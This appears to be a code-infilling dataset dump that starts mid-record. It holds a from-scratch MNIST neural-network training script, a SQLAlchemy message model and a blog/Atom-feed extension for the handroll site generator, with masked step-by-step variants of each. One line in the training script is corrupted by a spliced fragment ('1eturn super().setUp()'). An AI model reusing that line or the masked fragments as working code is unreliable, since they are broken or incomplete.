Loss.quadratic_d, 0.1)\n\n#IO.save_layer(hl_a, \"test\")\nhl_b = IO.load_layer(\"test\")\n\nfor i in range(9):\n img = Vector(Utils.normalize(Utils.flatten_2d(images[i]), 0, 255))\n o1 = hl_a.generate_output(img)\n o2 = hl_b.generate_output(img)\n #print(\"Picture \" + str(i + 1) + \": \" + str(o1) + \", \" + str(o2) + \", correct answer is \" + str(labels[i]))\n print(o1)\n print(o2) \"\"\"\n\n# Array flattening testing\n\"\"\" testarr = [[1, 2, 7, 8], [3, 4, 9, 10], [5, 6, 11, 12]]\ntestarr = Utils.flatten_2d(testarr)\nprint(testarr)\ntestarr = Utils.deflatten_2d(testarr, 4, 3)\nprint(testarr) \"\"\"\n\n# Let's test multi-layer nets\n\"\"\" images = IO.read_images('test')\nlabels = IO.read_labels('test')\nimg_test = images[:20]\nlab_test = 
labels[:20]\n\nweights_a = [Utils.rand_array(784, 0, 1) for _ in range(10)]\nweights_b = [Utils.rand_array(10, 0, 1) for _ in range(10)]\nhl_a = HiddenLayer(10, 784, weights_a, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1)\nhl_b = HiddenLayer(10, 10, weights_b, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1)\n\nLEARNING_RATE = 0.5\n\nfor (i, l) in zip(images, labels):\n img = Vector(Utils.normalize(Utils.flatten_2d(i), 0, 255))\n lab = Utils.onehot_label_arr(l)\n o_a = hl_a.generate_output(img)\n o_b = hl_b.generate_output(o_a)\n grads = Backpropagation.output_layer_grads(hl_b, o_b, lab, hl_a, LEARNING_RATE)\n #grad_b = \n #print(\"Picture \" + str(i + 1) + \": \" + str(o1) + \", \" + str(o2) + \", correct answer is \" + str(labels[i]))\n #print(o_a)\n #print(o_b)\n #print(lab)\n #print()\n #print(\"----\")\n\nfor n in hl_b.neurons:\n print(n.weights) \"\"\"\n\n# Let's try how well a single one-layer 10-neuron net performs!\n# Read images and labels\n\"\"\" images = IO.read_images('training')\nlabels = IO.read_labels('training')\ntest_images = IO.read_images('test')\ntest_labels = IO.read_labels('test')\nprint(\"Images & labels read!\")\n\n# Preprocess images and labels\nimages_flat = []\nlabels_oh = []\ntest_images_flat = []\n\nfor (i, l) in zip(images, labels):\n images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 255)))\n labels_oh.append(Utils.onehot_label_arr(l))\n\nfor i in test_images:\n test_images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 255)))\n\nprint(\"Images & labels processed!\")\n\n# Initialize weights and layer\n#weights_a = [Utils.rand_array(784, 0, 1) for _ in range(10)]\nweights_a = [[0] * 784] * 10\nhl_a = HiddenLayer(10, 784, weights_a, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0.1)\n\nLEARNING_RATE = 0.05\n\niter = 1eturn super().setUp()\nprev_correct = 0\n#old_weights = weights_a\nwhile True:\n print(\"Iteration: \" + str(iter))\n\n j = 1\n for (img, lab) in zip(images_flat, labels_oh):\n o_a = hl_a.generate_output(img)\n grads = Backpropagation.output_layer_backpropagate(hl_a, o_a, lab, img, LEARNING_RATE)\n \n if j % 1000 == 0:\n print(\" \" + str(j))\n j += 1\n\n right_amount = 0\n for (img, lab) in zip(test_images_flat, test_labels):\n o_a = hl_a.generate_output(img)\n pred = Utils.make_prediction(o_a)\n if pred == lab:\n right_amount += 1\n \n print(\"Correct predictions: \" + str(right_amount))\n\n if (iter > 10):\n break\n\n prev_correct = right_amount\n iter = iter + 1 \"\"\"\n\n#IO.save_layer(hl_a, \"test1_3\")\n\n\n\n# Visualize weights!\n\"\"\" hl_a = IO.load_layer(\"test1_3\")\n\ni = 0\nfor n in hl_a.neurons:\n weights = n.weights\n weights = Utils.fit_arr(weights, 0, 255)\n #print(weights)\n IO.save_image(Utils.deflatten_2d(weights, 28, 28), \"w\" + str(i))\n i += 1 \"\"\"\n\n\n\n# Final boss: a 32-16-10 multi-layer net!\nimages = IO.read_images('training')\nlabels = IO.read_labels('training')\ntest_images = IO.read_images('test')\ntest_labels = IO.read_labels('test')\nprint(\"Images & labels read!\")\n\n# Preprocess images and labels\nimages_flat = []\nlabels_oh = []\ntest_images_flat = []\n\nfor (i, l) in zip(images, labels):\n images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\n labels_oh.append(Utils.onehot_label_arr(l))\n\nfor i in test_images:\n test_images_flat.append(Vector(Utils.normalize(Utils.flatten_2d(i), 0, 1)))\n\nprint(\"Images & labels processed!\")\n\n# Don't change these 
two\nIMAGE_INPUT_SIZE = 784\nOUTPUT_LAYER_SIZE = 10\n\n# These define how many neurons in layers A & B\nLAYER_A_SIZE = 32\nLAYER_B_SIZE = 16\n\n# Initialize weights and layer\nweights_a = [Utils.rand_array(IMAGE_INPUT_SIZE, -1, 1) for _ in range(LAYER_A_SIZE)]\nweights_b = [Utils.rand_array(LAYER_A_SIZE, -1, 1) for _ in range(LAYER_B_SIZE)]\nweights_op = [Utils.rand_array(LAYER_B_SIZE, -1, 1) for _ in range(OUTPUT_LAYER_SIZE)]\n\nhl_a = HiddenLayer(LAYER_A_SIZE, IMAGE_INPUT_SIZE, weights_a, Activation.sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.mean_quadratic_d, 0)\nhl_b = HiddenLayer(LAYER_B_SIZE, LAYER_A_SIZE, weights_b, Activation.sigmoid, Activation.sigmoid_d, Loss.mean_quadratic, Loss.mean_quadratic_d, 0)\nopl = HiddenLayer(OUTPUT_LAYER_SIZE, LAYER_B_SIZE, weights_op, Activation.sigmoid, Activation.sigmoid_d, Loss.quadratic, Loss.quadratic_d, 0)\n\n# ---- Change these if you want to play around with the program ----\n\n# These decide when the training stops\nITERATION_CAP = 20 # after 20 iterations or\nACCURACY_CAP = 6500 # at 65% accuracy\n\n# These adjust the learning process\nINITIAL_LEARNING_RATE = 0.05\nLEARNING_DECAY_SCALAR = 0.0025\nBATCH_SIZE = 100\n\n# ----------------\n\nlearning_rate = INITIAL_LEARNING_RATE\niter = 1\nprev_correct = 0\n\nwhile True:\n print(\"Iteration: \" + str(iter))\n\n learning_rate = Rate.decaying(learning_rate, iter, LEARNING_DECAY_SCALAR)\n\n print(\"Learning rate: \" + str(learning_rate))\n \n j = 1\n batchtracker = 0\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n\n for (img, lab) in zip(images_flat, labels_oh):\n o_a = hl_a.generate_output(img)\n o_b = hl_b.generate_output(o_a['op'])\n output = opl.generate_output(o_b['op'])\n\n img_sum = img_sum + img\n lab_sum = lab_sum + Vector(lab)\n oa_sum = oa_sum + o_a['op']\n ob_sum = ob_sum + o_b['op']\n op_sum = op_sum + output['op']\n\n batchtracker = batchtracker + 1\n\n if batchtracker == BATCH_SIZE:\n img_sum = img_sum * (1 / BATCH_SIZE)\n lab_sum = lab_sum * (1 / BATCH_SIZE)\n oa_sum = oa_sum * (1 / BATCH_SIZE)\n ob_sum = ob_sum * (1 / BATCH_SIZE)\n op_sum = op_sum * (1 / BATCH_SIZE)\n\n #print(opl.loss(lab_sum, op_sum))\n\n opl_backprop = Backpropagation.output_layer_backpropagate(opl, op_sum, lab, ob_sum, learning_rate)\n hl_b_backprop = Backpropagation.hidden_layer_backpropagate(hl_b, oa_sum, ob_sum, opl_backprop, learning_rate)\n hl_a_backprop = Backpropagation.hidden_layer_backpropagate(hl_a, img, oa_sum, hl_b_backprop, learning_rate)\n\n img_sum = Vector([0] * IMAGE_INPUT_SIZE)\n lab_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n oa_sum = Vector([0] * LAYER_A_SIZE)\n ob_sum = Vector([0] * LAYER_B_SIZE)\n op_sum = Vector([0] * OUTPUT_LAYER_SIZE)\n batchtracker = 0\n\n \n if j % 10000 == 0:\n print(\" \" + str(j))\n j += 1\n\n print(\"Iteration \" + str(iter) + \" done! 
Now testing accuracy...\")\n\n right_amount = 0\n for (img_t, lab_t) in zip(test_images_flat, test_labels):\n oa = hl_a.generate_output(img_t)['op']\n ob = hl_b.generate_output(oa)['op']\n op = opl.generate_output(ob)['op']\n pred = Utils.make_prediction(op)\n if pred == lab_t:\n right_amount += 1\n \n print(\"Correct predictions: \" + str(right_amount))\n\n if (iter >= ITERATION_CAP):\n break\n \n if (prev_correct >= ACCURACY_CAP):\n break\n\n #if (prev_correct > right_amount):\n # break\n\n prev_correct = right_amount\n iter = iter + 1\n\nIO.save_layer(hl_a, \"test_layer_a\")\nIO.save_layer(hl_b, \"test_layer_b\")\nIO.save_layer(opl, \"test_layer_c\")", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import time
from sqlalchemy import Column, Unicode, UnicodeText, Integer
from models.base_model import SQLMixin, db, SQLBase


class Messages(SQLMixin, SQLBase):
    __tablename__ = 'Messages'

    title = Column(Unicode(50), nullable=False)
    content = Column(UnicodeText, nullable=False)
    sender_id = Column(Integer, nullable=False)
    receiver_id = Column(Integer, nullable=False)
normal
{ "blob_id": "6fbf64e2dc2836a54e54ee009be1d0d8d7c7037a", "index": 1688, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Messages(SQLMixin, SQLBase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Messages(SQLMixin, SQLBase):\n __tablename__ = 'Messages'\n title = Column(Unicode(50), nullable=False)\n content = Column(UnicodeText, nullable=False)\n sender_id = Column(Integer, nullable=False)\n receiver_id = Column(Integer, nullable=False)\n", "step-4": "import time\nfrom sqlalchemy import Column, Unicode, UnicodeText, Integer\nfrom models.base_model import SQLMixin, db, SQLBase\n\n\nclass Messages(SQLMixin, SQLBase):\n __tablename__ = 'Messages'\n title = Column(Unicode(50), nullable=False)\n content = Column(UnicodeText, nullable=False)\n sender_id = Column(Integer, nullable=False)\n receiver_id = Column(Integer, nullable=False)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Copyright (c) 2017, Matt Layman

import bisect
import configparser
import os

import smartypants
from werkzeug.contrib.atom import AtomFeed, FeedEntry

from handroll import logger
from handroll.exceptions import AbortError
from handroll.extensions.base import Extension
from handroll.i18n import _


class BlogPost(object):

    def __init__(self, **kwargs):
        self.date = kwargs['date']
        self.source_file = kwargs['source_file']
        self.summary = smartypants.smartypants(kwargs['summary'])
        self.title = smartypants.smartypants(kwargs['title'])
        self.route = kwargs['route']
        self.url = kwargs['url']
        # Having the posts enables a blog post to find its relationships.
        self._posts = kwargs['posts']

    def __eq__(self, other):
        if other is None:
            return False
        return self.__dict__ == other.__dict__

    def __lt__(self, other):
        return self.date < other.date

    def __ne__(self, other):
        return not self.__eq__(other)

    def __repr__(self):
        return 'BlogPost({}, {})'.format(self.source_file, self.date)

    @property
    def next(self):
        """Get the next chronological blog post."""
        posts_by_date = self.posts_by_date
        index = bisect.bisect_left(posts_by_date, self)
        if index + 1 == len(posts_by_date):
            return None
        return posts_by_date[index + 1]

    @property
    def previous(self):
        """Get the previous chronological blog post."""
        posts_by_date = self.posts_by_date
        index = bisect.bisect_left(posts_by_date, self)
        if index == 0:
            return None
        return posts_by_date[index - 1]

    @property
    def posts_by_date(self):
        return sorted(self._posts.values(), key=lambda p: p.date)


class BlogExtension(Extension):
    """Track files marked as blog entries and generate a feed."""

    handle_frontmatter_loaded = True
    handle_pre_composition = True
    handle_post_composition = True

    required_metadata = {
        'author': 'atom_author',
        'id': 'atom_id',
        'title': 'atom_title',
        'url': 'atom_url',
    }

    def __init__(self, config):
        super(BlogExtension, self).__init__(config)
        self.posts = {}
        self.atom_metadata = {}
        self.atom_output = ''
        self.list_template = None
        self.list_output = None
        self._resolver = None
        self._should_generate = True

    def on_pre_composition(self, director):
        """Check that all the required configuration exists."""
        if not self._config.parser.has_section('blog'):
            raise AbortError(
                _('A blog section is missing in the configuration file.'))

        # Collect atom feed configuration.
        for metadata, option in self.required_metadata.items():
            self._add_atom_metadata(metadata, option)
        self.atom_output = self._get_option('atom_output')

        # Collect HTML listing configuration.
        if self._config.parser.has_option('blog', 'list_template'):
            self.list_template = self._get_option('list_template')
            self.list_output = self._get_option('list_output')

        # Grab the resolver from the director for determining URLs for posts.
        self._resolver = director.resolver

    def on_frontmatter_loaded(self, source_file, frontmatter):
        """Record any new blog posts."""
        if not self._is_post(frontmatter):
            return
        self._validate_post(source_file, frontmatter)
        post = BlogPost(
            date=frontmatter['date'],
            source_file=source_file,
            summary=frontmatter.get('summary', ''),
            title=frontmatter['title'],
            route=self._resolver.as_route(source_file),
            url=self._resolver.as_url(source_file),
            posts=self.posts,
        )
        frontmatter['post'] = post
        if post != self.posts.get(source_file):
            self.posts[source_file] = post
            self._should_generate = True

    def on_post_composition(self, director):
        """Generate blog output."""
        if not self._should_generate:
            return
        blog_posts = sorted(
            self.posts.values(), key=lambda p: p.date, reverse=True)
        self._generate_atom_feed(director, blog_posts)
        if self.list_template is not None:
            self._generate_list_page(director, blog_posts)
        self._should_generate = False

    def _is_post(self, frontmatter):
        """Check if the front matter looks like a blog post."""
        is_post = frontmatter.get('blog', False)
        if type(is_post) != bool:
            raise AbortError(
                _('Invalid blog frontmatter (expects True or False): '
                  '{blog_value}').format(blog_value=is_post))
        return is_post

    def _validate_post(self, source_file, frontmatter):
        """Validate that the post contains all the required fields."""
        required = set([
            'date',
            'title',
        ])
        fields = set(frontmatter.keys())
        missing = required - fields
        if missing:
            raise AbortError(_(
                'The blog post, {filename}, '
                'is missing required fields: {missing_fields}'.format(
                    filename=source_file, missing_fields=', '.join(missing))))

    def _generate_atom_feed(self, director, blog_posts):
        """Generate the atom feed."""
        logger.info(_('Generating Atom XML feed ...'))
        builder = FeedBuilder(self.atom_metadata)
        builder.add(blog_posts)
        output_file = os.path.join(director.outdir, self.atom_output)
        builder.write_to(output_file)

    def _generate_list_page(self, director, blog_posts):
        """Generate the list page."""
        logger.info(_('Generating blog list page ...'))
        template = director.catalog.get_template(self.list_template)
        builder = ListPageBuilder(template)
        builder.add(blog_posts)
        output_file = os.path.join(director.outdir, self.list_output)
        builder.write_to(output_file)

    def _add_atom_metadata(self, name, option):
        """Add atom metadata from the config parser."""
        self.atom_metadata[name] = self._get_option(option)

    def _get_option(self, option):
        """Get an option out of the blog section."""
        try:
            return self._config.parser.get('blog', option)
        except configparser.NoOptionError:
            raise AbortError(
                _('The blog extension requires the {option} option.').format(
                    option=option))


class BlogBuilder(object):
    """A template pattern class for generating output related to a blog."""

    def _generate_output(self):
        """Generate output that belongs in the destination file.

        Subclasses must implement this method.
        """
        raise NotImplementedError()

    def write_to(self, filepath):
        """Write the output to the provided filepath."""
        output = self._generate_output()
        with open(filepath, 'wb') as out:
            out.write(output.encode('utf-8'))
            out.write(b'<!-- handrolled for excellence -->\n')


class FeedBuilder(BlogBuilder):
    """Transform blog metadata and posts into an Atom feed."""

    def __init__(self, metadata):
        self.metadata = metadata
        self._feed = AtomFeed(**metadata)

    def add(self, posts):
        """Add blog posts to the feed."""
        for post in posts:
            self._feed.add(FeedEntry(
                summary=post.summary,
                title=post.title,
                title_type='html',
                url=post.url,
                updated=post.date,
            ))

    def _generate_output(self):
        return self._feed.to_string()


class ListPageBuilder(BlogBuilder):
    """Transform blog posts into a list page."""

    def __init__(self, template):
        self._template = template
        self._blog_list = ''
        self._posts = None

    def add(self, posts):
        """Add the posts and generate a blog list."""
        li_html = []
        for post in posts:
            li_html.append(
                u'<li><a href="{route}">{title}</a></li>'.format(
                    route=post.route, title=post.title))
        self._blog_list = u'\n'.join(li_html)
        self._posts = posts

    def _generate_output(self):
        context = {
            'blog_list': self._blog_list,
            'posts': self._posts,
        }
        return self._template.render(context)
normal
{ "blob_id": "c3d9ad49b62c56dfbd9674cb1ac5c206e6401a27", "index": 830, "step-1": "<mask token>\n\n\nclass BlogBuilder(object):\n <mask token>\n\n def _generate_output(self):\n \"\"\"Generate output that belongs in the destination file.\n\n Subclasses must implement this method.\n \"\"\"\n raise NotImplementedError()\n\n def write_to(self, filepath):\n \"\"\"Write the output to the provided filepath.\"\"\"\n output = self._generate_output()\n with open(filepath, 'wb') as out:\n out.write(output.encode('utf-8'))\n out.write(b'<!-- handrolled for excellence -->\\n')\n\n\nclass FeedBuilder(BlogBuilder):\n \"\"\"Transform blog metadata and posts into an Atom feed.\"\"\"\n\n def __init__(self, metadata):\n self.metadata = metadata\n self._feed = AtomFeed(**metadata)\n\n def add(self, posts):\n \"\"\"Add blog posts to the feed.\"\"\"\n for post in posts:\n self._feed.add(FeedEntry(summary=post.summary, title=post.title,\n title_type='html', url=post.url, updated=post.date))\n\n def _generate_output(self):\n return self._feed.to_string()\n\n\nclass ListPageBuilder(BlogBuilder):\n \"\"\"Transform blog posts into a list page.\"\"\"\n\n def __init__(self, template):\n self._template = template\n self._blog_list = ''\n self._posts = None\n\n def add(self, posts):\n \"\"\"Add the posts and generate a blog list.\"\"\"\n li_html = []\n for post in posts:\n li_html.append(u'<li><a href=\"{route}\">{title}</a></li>'.format\n (route=post.route, title=post.title))\n self._blog_list = u'\\n'.join(li_html)\n self._posts = posts\n\n def _generate_output(self):\n context = {'blog_list': self._blog_list, 'posts': self._posts}\n return self._template.render(context)\n", "step-2": "<mask token>\n\n\nclass BlogExtension(Extension):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, config):\n super(BlogExtension, self).__init__(config)\n self.posts = {}\n self.atom_metadata = {}\n self.atom_output = ''\n self.list_template = None\n self.list_output = None\n self._resolver = None\n self._should_generate = True\n\n def on_pre_composition(self, director):\n \"\"\"Check that all the required configuration exists.\"\"\"\n if not self._config.parser.has_section('blog'):\n raise AbortError(_(\n 'A blog section is missing in the configuration file.'))\n for metadata, option in self.required_metadata.items():\n self._add_atom_metadata(metadata, option)\n self.atom_output = self._get_option('atom_output')\n if self._config.parser.has_option('blog', 'list_template'):\n self.list_template = self._get_option('list_template')\n self.list_output = self._get_option('list_output')\n self._resolver = director.resolver\n <mask token>\n\n def on_post_composition(self, director):\n \"\"\"Generate blog output.\"\"\"\n if not self._should_generate:\n return\n blog_posts = sorted(self.posts.values(), key=lambda p: p.date,\n reverse=True)\n self._generate_atom_feed(director, blog_posts)\n if self.list_template is not None:\n self._generate_list_page(director, blog_posts)\n self._should_generate = False\n\n def _is_post(self, frontmatter):\n \"\"\"Check if the front matter looks like a blog post.\"\"\"\n is_post = frontmatter.get('blog', False)\n if type(is_post) != bool:\n raise AbortError(_(\n 'Invalid blog frontmatter (expects True or False): {blog_value}'\n ).format(blog_value=is_post))\n return is_post\n\n def _validate_post(self, source_file, frontmatter):\n \"\"\"Validate that the post contains all the required fields.\"\"\"\n required = set(['date', 'title'])\n fields = 
set(frontmatter.keys())\n missing = required - fields\n if missing:\n raise AbortError(_(\n 'The blog post, {filename}, is missing required fields: {missing_fields}'\n .format(filename=source_file, missing_fields=', '.join(\n missing))))\n\n def _generate_atom_feed(self, director, blog_posts):\n \"\"\"Generate the atom feed.\"\"\"\n logger.info(_('Generating Atom XML feed ...'))\n builder = FeedBuilder(self.atom_metadata)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.atom_output)\n builder.write_to(output_file)\n\n def _generate_list_page(self, director, blog_posts):\n \"\"\"Generate the list page.\"\"\"\n logger.info(_('Generating blog list page ...'))\n template = director.catalog.get_template(self.list_template)\n builder = ListPageBuilder(template)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.list_output)\n builder.write_to(output_file)\n\n def _add_atom_metadata(self, name, option):\n \"\"\"Add atom metadata from the config parser.\"\"\"\n self.atom_metadata[name] = self._get_option(option)\n\n def _get_option(self, option):\n \"\"\"Get an option out of the blog section.\"\"\"\n try:\n return self._config.parser.get('blog', option)\n except configparser.NoOptionError:\n raise AbortError(_(\n 'The blog extension requires the {option} option.').format(\n option=option))\n\n\nclass BlogBuilder(object):\n \"\"\"A template pattern class for generating output related to a blog.\"\"\"\n\n def _generate_output(self):\n \"\"\"Generate output that belongs in the destination file.\n\n Subclasses must implement this method.\n \"\"\"\n raise NotImplementedError()\n\n def write_to(self, filepath):\n \"\"\"Write the output to the provided filepath.\"\"\"\n output = self._generate_output()\n with open(filepath, 'wb') as out:\n out.write(output.encode('utf-8'))\n out.write(b'<!-- handrolled for excellence -->\\n')\n\n\nclass FeedBuilder(BlogBuilder):\n \"\"\"Transform blog metadata and posts into an Atom feed.\"\"\"\n\n def __init__(self, metadata):\n self.metadata = metadata\n self._feed = AtomFeed(**metadata)\n\n def add(self, posts):\n \"\"\"Add blog posts to the feed.\"\"\"\n for post in posts:\n self._feed.add(FeedEntry(summary=post.summary, title=post.title,\n title_type='html', url=post.url, updated=post.date))\n\n def _generate_output(self):\n return self._feed.to_string()\n\n\nclass ListPageBuilder(BlogBuilder):\n \"\"\"Transform blog posts into a list page.\"\"\"\n\n def __init__(self, template):\n self._template = template\n self._blog_list = ''\n self._posts = None\n\n def add(self, posts):\n \"\"\"Add the posts and generate a blog list.\"\"\"\n li_html = []\n for post in posts:\n li_html.append(u'<li><a href=\"{route}\">{title}</a></li>'.format\n (route=post.route, title=post.title))\n self._blog_list = u'\\n'.join(li_html)\n self._posts = posts\n\n def _generate_output(self):\n context = {'blog_list': self._blog_list, 'posts': self._posts}\n return self._template.render(context)\n", "step-3": "<mask token>\n\n\nclass BlogPost(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass BlogExtension(Extension):\n \"\"\"Track files marked as blog entries and generate a feed.\"\"\"\n handle_frontmatter_loaded = True\n handle_pre_composition = True\n handle_post_composition = True\n required_metadata = {'author': 'atom_author', 'id': 'atom_id', 'title':\n 'atom_title', 'url': 'atom_url'}\n\n def __init__(self, config):\n super(BlogExtension, 
self).__init__(config)\n self.posts = {}\n self.atom_metadata = {}\n self.atom_output = ''\n self.list_template = None\n self.list_output = None\n self._resolver = None\n self._should_generate = True\n\n def on_pre_composition(self, director):\n \"\"\"Check that all the required configuration exists.\"\"\"\n if not self._config.parser.has_section('blog'):\n raise AbortError(_(\n 'A blog section is missing in the configuration file.'))\n for metadata, option in self.required_metadata.items():\n self._add_atom_metadata(metadata, option)\n self.atom_output = self._get_option('atom_output')\n if self._config.parser.has_option('blog', 'list_template'):\n self.list_template = self._get_option('list_template')\n self.list_output = self._get_option('list_output')\n self._resolver = director.resolver\n\n def on_frontmatter_loaded(self, source_file, frontmatter):\n \"\"\"Record any new blog posts.\"\"\"\n if not self._is_post(frontmatter):\n return\n self._validate_post(source_file, frontmatter)\n post = BlogPost(date=frontmatter['date'], source_file=source_file,\n summary=frontmatter.get('summary', ''), title=frontmatter[\n 'title'], route=self._resolver.as_route(source_file), url=self.\n _resolver.as_url(source_file), posts=self.posts)\n frontmatter['post'] = post\n if post != self.posts.get(source_file):\n self.posts[source_file] = post\n self._should_generate = True\n\n def on_post_composition(self, director):\n \"\"\"Generate blog output.\"\"\"\n if not self._should_generate:\n return\n blog_posts = sorted(self.posts.values(), key=lambda p: p.date,\n reverse=True)\n self._generate_atom_feed(director, blog_posts)\n if self.list_template is not None:\n self._generate_list_page(director, blog_posts)\n self._should_generate = False\n\n def _is_post(self, frontmatter):\n \"\"\"Check if the front matter looks like a blog post.\"\"\"\n is_post = frontmatter.get('blog', False)\n if type(is_post) != bool:\n raise AbortError(_(\n 'Invalid blog frontmatter (expects True or False): {blog_value}'\n ).format(blog_value=is_post))\n return is_post\n\n def _validate_post(self, source_file, frontmatter):\n \"\"\"Validate that the post contains all the required fields.\"\"\"\n required = set(['date', 'title'])\n fields = set(frontmatter.keys())\n missing = required - fields\n if missing:\n raise AbortError(_(\n 'The blog post, {filename}, is missing required fields: {missing_fields}'\n .format(filename=source_file, missing_fields=', '.join(\n missing))))\n\n def _generate_atom_feed(self, director, blog_posts):\n \"\"\"Generate the atom feed.\"\"\"\n logger.info(_('Generating Atom XML feed ...'))\n builder = FeedBuilder(self.atom_metadata)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.atom_output)\n builder.write_to(output_file)\n\n def _generate_list_page(self, director, blog_posts):\n \"\"\"Generate the list page.\"\"\"\n logger.info(_('Generating blog list page ...'))\n template = director.catalog.get_template(self.list_template)\n builder = ListPageBuilder(template)\n builder.add(blog_posts)\n output_file = os.path.join(director.outdir, self.list_output)\n builder.write_to(output_file)\n\n def _add_atom_metadata(self, name, option):\n \"\"\"Add atom metadata from the config parser.\"\"\"\n self.atom_metadata[name] = self._get_option(option)\n\n def _get_option(self, option):\n \"\"\"Get an option out of the blog section.\"\"\"\n try:\n return self._config.parser.get('blog', option)\n except configparser.NoOptionError:\n raise AbortError(_(\n 'The blog extension requires the 
{option} option.').format(\n option=option))\n\n\nclass BlogBuilder(object):\n \"\"\"A template pattern class for generating output related to a blog.\"\"\"\n\n def _generate_output(self):\n \"\"\"Generate output that belongs in the destination file.\n\n Subclasses must implement this method.\n \"\"\"\n raise NotImplementedError()\n\n def write_to(self, filepath):\n \"\"\"Write the output to the provided filepath.\"\"\"\n output = self._generate_output()\n with open(filepath, 'wb') as out:\n out.write(output.encode('utf-8'))\n out.write(b'<!-- handrolled for excellence -->\\n')\n\n\nclass FeedBuilder(BlogBuilder):\n \"\"\"Transform blog metadata and posts into an Atom feed.\"\"\"\n\n def __init__(self, metadata):\n self.metadata = metadata\n self._feed = AtomFeed(**metadata)\n\n def add(self, posts):\n \"\"\"Add blog posts to the feed.\"\"\"\n for post in posts:\n self._feed.add(FeedEntry(summary=post.summary, title=post.title,\n title_type='html', url=post.url, updated=post.date))\n\n def _generate_output(self):\n return self._feed.to_string()\n\n\nclass ListPageBuilder(BlogBuilder):\n \"\"\"Transform blog posts into a list page.\"\"\"\n\n def __init__(self, template):\n self._template = template\n self._blog_list = ''\n self._posts = None\n\n def add(self, posts):\n \"\"\"Add the posts and generate a blog list.\"\"\"\n li_html = []\n for post in posts:\n li_html.append(u'<li><a href=\"{route}\">{title}</a></li>'.format\n (route=post.route, title=post.title))\n self._blog_list = u'\\n'.join(li_html)\n self._posts = posts\n\n def _generate_output(self):\n context = {'blog_list': self._blog_list, 'posts': self._posts}\n return self._template.render(context)\n", "step-4": "<mask token>\n\n\nclass BlogPost(object):\n\n def __init__(self, **kwargs):\n self.date = kwargs['date']\n self.source_file = kwargs['source_file']\n self.summary = smartypants.smartypants(kwargs['summary'])\n self.title = smartypants.smartypants(kwargs['title'])\n self.route = kwargs['route']\n self.url = kwargs['url']\n self._posts = kwargs['posts']\n <mask token>\n\n def __lt__(self, other):\n return self.date < other.date\n\n def __ne__(self, other):\n return not self.__eq__(other)\n <mask token>\n\n @property\n def next(self):\n \"\"\"Get the next chronological blog post.\"\"\"\n posts_by_date = self.posts_by_date\n index = bisect.bisect_left(posts_by_date, self)\n if index + 1 == len(posts_by_date):\n return None\n return posts_by_date[index + 1]\n <mask token>\n <mask token>\n\n\nclass BlogExtension(Extension):\n \"\"\"Track files marked as blog entries and generate a feed.\"\"\"\n handle_frontmatter_loaded = True\n handle_pre_composition = True\n handle_post_composition = True\n required_metadata = {'author': 'atom_author', 'id': 'atom_id', 'title':\n 'atom_title', 'url': 'atom_url'}\n\n def __init__(self, config):\n super(BlogExtension, self).__init__(config)\n self.posts = {}\n self.atom_metadata = {}\n self.atom_output = ''\n self.list_template = None\n self.list_output = None\n self._resolver = None\n self._should_generate = True\n\n def on_pre_composition(self, director):\n \"\"\"Check that all the required configuration exists.\"\"\"\n if not self._config.parser.has_section('blog'):\n raise AbortError(_(\n 'A blog section is missing in the configuration file.'))\n for metadata, option in self.required_metadata.items():\n self._add_atom_metadata(metadata, option)\n self.atom_output = self._get_option('atom_output')\n if self._config.parser.has_option('blog', 'list_template'):\n self.list_template = 
self._get_option('list_template')\n self.list_output = self._get_option('list_output')\n self._resolver = director.resolver\n\n def on_frontmatter_loaded(self, source_file, frontmatter):\n \"\"\"Record any new blog posts.\"\"\"\n if not self._is_post(frontmatter):\n return\n self._validate_post(source_file, frontmatter)\n post = BlogPost(date=frontmatter['date'], source_file=source_file,\n summary=frontmatter.get('summary', ''), title=frontmatter[\n 'title'], route=self._resolver.as_route(source_file), url=self.\n _resolver.as_url(source_file), posts=self.posts)\n frontmatter['post'] = post\n if post != self.posts.get(source_file):\n self.posts[source_file] = post\n self._should_generate = True\n\n def on_post_composition(self, director):\n \"\"\"Generate blog output.\"\"\"\n if not self._should_generate:\n return\n blog_posts = sorted(self.posts.values(), key=lambda p: p.date,\n reverse=True)\n self._generate_atom_feed(director, blog_posts)\n if self.list_template is not None:\n self._generate_list_page(director, blog_posts)\n self._should_generate = False\n\n def _is_post(self, frontmatter):\n \"\"\"Check if the front matter looks like a blog post.\"\"\"\n is_post = frontmatter.get('blog', False)\n if type(is_post) != bool:\n raise AbortError(_(\n 'Invalid blog frontmatter (expects True or False): {blog_value}'\n ).format(blog_value=is_post))\n return is_post\n\n def _validate_post(self, source_file, frontmatter):\n \"\"\"Validate that the post contains all the required fields.\"\"\"\n required = set(['date', 'title'])\n fields = set(frontmatter.keys())\n missing = required - fields\n if missing:\n raise AbortError(_(\n 'The blog post, {filename}, is missing required fields: {missing_fields}'\n .format(filename=source_file, missing_fields=', '.join(\n missing))))\n\n def _generate_atom_feed(self, director, blog_posts):\n \"\"\"Generate the atom feed.\"\"\"\n logger.info(_('Generating Atom XML feed ...'))\n builder = 